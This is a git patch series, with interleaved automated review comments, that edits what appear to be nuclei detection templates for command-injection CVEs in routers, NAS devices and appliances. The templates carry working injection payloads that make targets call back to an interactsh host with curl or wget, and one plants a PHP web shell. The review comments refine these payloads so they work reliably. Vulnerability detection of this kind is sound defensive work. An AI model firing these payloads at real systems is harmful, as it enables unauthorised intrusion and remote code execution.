From d5160b17781b41a060c28a5cabf014ef0625dec3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 12:09:20 +0530 Subject: [PATCH 01/15] Update CVE-2021-20038.yaml --- cves/2021/CVE-2021-20038.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20038.yaml b/cves/2021/CVE-2021-20038.yaml index 715965bd7a..96fe0ef47c 100644 --- a/cves/2021/CVE-2021-20038.yaml +++ b/cves/2021/CVE-2021-20038.yaml @@ -19,7 +19,7 @@ info: requests: - raw: - | - GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1 + GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'};?{{repeat("A", 518)}} HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -30,10 +30,16 @@ requests: - "%08%b7%06%08" # for 10.2.1.2-24sv - "%64%b8%06%08" # for 10.2.1.1-1[79]sv + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/04/29 From 221b69c8cb54f6e64e7e05b9073d368d4a1e740a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:31:08 +0530 Subject: [PATCH 02/15] added addtional matcher --- cves/2020/CVE-2020-28188.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index ef78a1e202..a627f79476 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml 
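Review bot: The new path segment `{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'}` depends on `+` becoming a space, but `+` is only a space in form-encoded query strings, never in a URL path, so after brace expansion the shell most likely gets the single word `http://…+-H+User-Agent%3a+…` as curl's URL and no callback is made. The replaced `{wget,http://{{interactsh-url}}}` worked because the comma is what brace expansion turns into a word boundary; keep that and let it supply every space: `{curl,http://{{interactsh-url}},-A,{{rand_base(6)}}}` (`-A` sets the User-Agent with no quotes or colon to encode). Whether the SMA httpd decodes `+` in a path I cannot confirm from here, but the comma form does not depend on it. Each copy of the payload is also roughly 40 bytes longer than before, so it is worth re-checking that `{{repeat("A", 518)}}` still places the overflow correctly.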
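Review bot: `{{rand_base(6)}}` in the added matcher `- "User-Agent: {{rand_base(6)}}"` is a fresh random string, expanded independently of the one substituted into the request line, so the value interactsh records can never equal it, and with `matchers-condition: and` the template cannot match at all. The value must be generated once and referenced from both places — a template-level `variables:` entry such as `useragent: '{{rand_base(6)}}'`, used as `{{useragent}}` in the payload and in the matcher. Later patches in this series introduce exactly that variable, so this commit should not be applied on its own.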
@@ -20,17 +20,24 @@ info: requests: - raw: - | - GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/03/27 From eb4de2bf7df5bf35312d4169ee68833f3121e12c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:33:28 +0530 Subject: [PATCH 03/15] added additional matcher --- cves/2021/CVE-2021-41653.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index bbc4fdbe67..be352b0d97 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -30,7 +30,7 @@ requests: dataBlockSize=64 timeout=1 numberOfRepetitions=4 - host=$(echo 127.0.0.1; wget http://{{interactsh-url}}) + host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}') X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested @@ -43,10 +43,16 @@ requests: [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/02/27 From 2dba919ec21f73b8ab56ef8cd34ad063d576dd22 Mon Sep 17 00:00:00 2001 
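Review bot: Replacing `wget` with `curl` in `host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}')` is likely to lose detections on the affected TP-Link routers, whose BusyBox-based firmware has a `wget` applet but does not normally ship `curl` — the original chose `wget` for that reason. If the only goal is to tag the callback for the new matcher, `host=$(echo 127.0.0.1; wget -U {{rand_base(6)}} http://{{interactsh-url}})` keeps the BusyBox-compatible binary and still sends `User-Agent: <value>` (`-U` is accepted by GNU wget and by BusyBox wget; confirm on a real device). As written, a device without curl produces no interaction and the template reports nothing rather than failing visibly. The raw request this line belongs to begins before the hunk.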
From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:40:35 +0530 Subject: [PATCH 04/15] added matcher and useragent --- cves/2021/CVE-2021-36356.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-36356.yaml b/cves/2021/CVE-2021-36356.yaml index 282163136b..c996b2f247 100644 --- a/cves/2021/CVE-2021-36356.yaml +++ b/cves/2021/CVE-2021-36356.yaml @@ -27,13 +27,19 @@ requests: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'")}' HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/18 From 1f980803939cc7f79dd206e97571c6b43048f35a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:43:50 +0530 Subject: [PATCH 05/15] added additional matcher --- cves/2018/CVE-2018-10562.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index fe4ea6bae0..89698f4ce8 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml 
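Review bot: The decoded `cmd=` value nests single quotes inside a single-quoted shell argument — `sudo rpm --eval '%{lua:os.execute("curl http://… -H 'User-Agent: …'")}'` — so `sh -c` closes the outer quote at the `'` before `User-Agent`, splits the Lua macro across two words, and rpm never receives a complete `%{lua:…}` expression; the replaced line had no inner quotes and did not have this problem. Drop the quotes rather than escaping them: `os.execute("curl+http%3a//{{interactsh-url}}+-A+{{rand_base(6)}}")` inside the existing `'%25{lua%3a…}'` argument sends the same `User-Agent: <value>` header the new matcher checks. The matcher itself also needs to read the same generated value as the payload (two separate `{{rand_base(6)}}` expansions differ), which a template `variables:` entry provides. The `requests:` entry begins before this hunk.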
@@ -23,19 +23,25 @@ requests: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/12 From 788b24b9e54e0dcc49003e6913a2ca45c48b8b3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:47:09 +0530 Subject: [PATCH 06/15] added additional matcher --- cves/2020/CVE-2020-17456.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index fba91c11a2..f631f02460 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml 
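Review bot: `busybox+curl+http%3a//…` can never execute: BusyBox provides a `wget` applet but no `curl` applet, so the first half of the `dest_host` payload fails on exactly the GPON firmware this template targets. The kept fallback `;busybox wget http://{{interactsh-url}}` still triggers an interaction, but it carries no tagged User-Agent, and under the new `matchers-condition: and` that interaction fails the `interactsh_request` matcher — so the template can no longer report a vulnerable device at all. Use the applet that exists and tag it there: inside the backticks `busybox+wget+-U+{{rand_base(6)}}+http%3a//{{interactsh-url}}`, followed by `;busybox wget -U {{rand_base(6)}} http://{{interactsh-url}}&ipv=0` (`-U` sets the agent string in BusyBox wget; verify on the device's build). The payload and the matcher must also share one generated value, via a `variables:` entry, rather than two independent `{{rand_base(6)}}` expansions.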
@@ -31,7 +31,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -41,6 +41,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + - type: word part: header words: From 781db94338e8ecd1e887cd3e1e7f0e2702b6530c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:48:20 +0530 Subject: [PATCH 07/15] added additional matcher --- cves/2020/CVE-2020-28871.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 1d08b57be1..ae16e2387b 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -34,7 +34,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 15:49:41 +0530 Subject: [PATCH 08/15] added additional matcher --- cves/2020/CVE-2020-25506.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index c9c34af0e6..ea7bab4c23 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml 
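Review bot: The new `pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'` only works if `com.cgi` decodes `+` as a space and if `curl` exists on the router, and nothing in the template supports either assumption: the replaced line used literal spaces (`;wget http://{{interactsh-url}}`), and a BusyBox-class Seowon router normally has `wget` but not `curl`. If `+` is not decoded the whole thing is one token and no callback occurs; if `curl` is missing the same happens. A lower-risk form keeps both the original spelling and the original binary: `pingIpAddr=;wget -U {{rand_base(6)}} http://{{interactsh-url}}&pingPktSize=56…` (`-U` sets User-Agent in GNU and BusyBox wget; worth confirming on the device). The matchers for this request are in the following hunk, where the `{{rand_base(6)}}` in the matcher will need to be the same value as the one sent here.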
@@ -23,17 +23,23 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/03/27 From 46591125182ee2c41cacdec688ff511f2052710e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:51:17 +0530 Subject: [PATCH 09/15] added additional matcher --- cves/2018/CVE-2018-10818.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index af6bee0a00..0290f53805 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml 
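Review bot: Five raw spaces and two single quotes now sit in the request line of the second request (`POST /cgi-bin/system_mgr.cgi?…&f_ntp_server=` followed by the backtick-wrapped `curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` and then `HTTP/1.1`); the old line already had one raw space there, but a request-line parser that takes the path as the token before the first space would hand the CGI only `…f_ntp_server=` plus the opening backtick and `curl`, and I cannot confirm from here how nuclei's raw parser re-joins such a line. Percent-encode the query in the request-line variant (`%20` for spaces, `%27` for the quotes), or use `-A {{rand_base(6)}}` to drop the quotes and the colon entirely. The DNS-320 is BusyBox-based, so if `curl` is absent the body-based first request will not call back either; `wget -U {{rand_base(6)}} http://{{interactsh-url}}` keeps the binary the replaced line relied on.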
@@ -20,24 +20,26 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; wget http://{{interactsh-url}} + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;wget http://{{interactsh-url}} + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status - status: - - 200 + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" # Enhanced by mp on 2022/04/26 From 38870df9a64a7cd9938cabcdfd638e52fde9ec68 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:52:44 +0530 Subject: [PATCH 10/15] added additional matcher --- cves/2021/CVE-2021-21881.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml index 1e36958c23..8438fb6d33 100644 --- a/cves/2021/CVE-2021-21881.yaml +++ b/cves/2021/CVE-2021-21881.yaml @@ -23,7 +23,7 @@ requests: Authorization: Basic dXNlcjp1c2Vy Content-Type: application/x-www-form-urlencoded - ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} # + ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' # - | POST / HTTP/1.1 
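Review bot: The payload `ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' #` adds a second pair of single quotes behind a `"'` breakout that was evidently written to escape whether the CGI wraps the value in `'` or in `"`. In the `"…"` case the leading `"` closes the wrapper, the `'` opens a single-quoted string that ends at the quote before `User-Agent`, and the last `'` opens another that swallows the ` #`, leaving an unterminated quote and no command at all — whereas the replaced quote-free `wget http://{{interactsh-url}}` survived both contexts. Keep the payload free of quotes: `ssid="'; curl http://{{interactsh-url}} -A {{rand_base(6)}} #`. I cannot see which quoting the PremierWave CGI applies; the point is that the hedge the `"'` prefix provided is lost, and the same line appears again in the next hunk.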
@@ -31,12 +31,19 @@ requests: Authorization: Basic YWRtaW46UEFTUw== Content-Type: application/x-www-form-urlencoded - ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} # + ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' # + stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/05 From 5d358a40397dffcdee5d8e8d35f92ee5792f9d87 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:57:31 +0530 Subject: [PATCH 11/15] added additional matcher --- cves/2021/CVE-2021-1497.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index d879c8c812..fe0cfdcbf7 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -28,7 +28,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'\");print(crypt.crypt(\"')}} - | POST /auth HTTP/1.1 
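Review bot: The bare single quotes in `-H 'User-Agent: {{rand_base(6)}}'` sit inside the single-quoted DSL literal of `{{url_encode('…')}}`, so the quote before `User-Agent` terminates the literal early and the expression cannot parse — the password field is never rendered, whereas the replaced line only used the escaped `\"` form inside that literal. Avoid introducing any quote character: `os.system(\"curl http://{{interactsh-url}} -A {{rand_base(6)}}\")` sends the same `User-Agent: <value>` header the new matcher looks for. The same construction is repeated in the second `/auth` request of this file, which needs the identical fix.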
@@ -36,16 +36,18 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'\");print(crypt.crypt(\"')}} matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/04/29 From a037cb0204a523538959eabe2884e758cee8134a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 16:37:38 +0530 Subject: [PATCH 12/15] requested changes made --- cves/2018/CVE-2018-10562.yaml | 9 ++++++--- cves/2018/CVE-2018-10818.yaml | 9 ++++++--- cves/2020/CVE-2020-17456.yaml | 7 +++++-- cves/2020/CVE-2020-25506.yaml | 9 ++++++--- cves/2020/CVE-2020-28188.yaml | 9 ++++++--- cves/2020/CVE-2020-28871.yaml | 7 +++++-- cves/2021/CVE-2021-1497.yaml | 9 ++++++--- cves/2021/CVE-2021-20038.yaml | 7 +++++-- cves/2021/CVE-2021-21881.yaml | 9 ++++++--- cves/2021/CVE-2021-36356.yaml | 7 +++++-- cves/2021/CVE-2021-41653.yaml | 7 +++++-- 11 files changed, 61 insertions(+), 28 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index 89698f4ce8..a8a7b30bc8 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml 
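Review bot: The second `/auth` request has the same unbalanced quoting as the first: `'User-Agent: {{rand_base(6)}}'` is placed inside the single-quoted argument of `url_encode('…')`, so the DSL string ends at that quote and the whole `{{url_encode(…)}}` fails to evaluate; `-A {{rand_base(6)}}` inside the existing `\"…\"` string avoids adding any quote at all. Separately, the `{{rand_base(6)}}` in the new `interactsh_request` matcher is expanded on its own, so it never equals the value sent, and under `matchers-condition: and` the template cannot match until both read one shared variable (for example `variables:` with `useragent: '{{rand_base(6)}}'`). Removing the `status: 200` matcher is reasonable once the OAST matchers carry the decision.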
@@ -17,19 +17,22 @@ info: cwe-id: CWE-78 tags: cve,cve2018,dasan,gpon,rce,oast,kev +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true matchers-condition: and @@ -42,6 +45,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 0290f53805..a3c191a56c 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -13,6 +13,9 @@ info: cve-id: CVE-2018-10818 tags: cve,cve2018,lg-nas,rce,oast,injection +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | 
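Review bot: Even with `base` now expanded once and shared by payload and matcher, the first half of `dest_host` is still `busybox+curl+…`, and BusyBox has no `curl` applet, so only the untagged `;busybox wget http://{{interactsh-url}}` fallback can call back — and that request carries no `User-Agent: {{base}}` header, so under `matchers-condition: and` the template still cannot match. Tag the applet that exists and drop the curl half: inside the backticks `busybox+wget+-U+{{base}}+http%3a//{{interactsh-url}}`, then `;busybox wget -U {{base}} http://{{interactsh-url}}&ipv=0` (`-U` sets the agent string in BusyBox wget; verify on the device's build). The `variables:` block is the right fix for the mismatch; it just does not make the curl invocation runnable.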
@@ -20,14 +23,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' stop-at-first-match: true matchers-condition: and @@ -40,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/04/26 diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index f631f02460..bd364bde5b 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-78 tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -31,7 +34,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -44,7 +47,7 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" - type: word part: header 
diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index ea7bab4c23..31d960594d 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-78 tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -23,10 +26,10 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -40,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a627f79476..a3359eb1bf 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -17,14 +17,17 @@ info: cwe-id: CWE-78 tags: cve,cve2020,terramaster,rce,oast,mirai,unauth +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | - GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true 
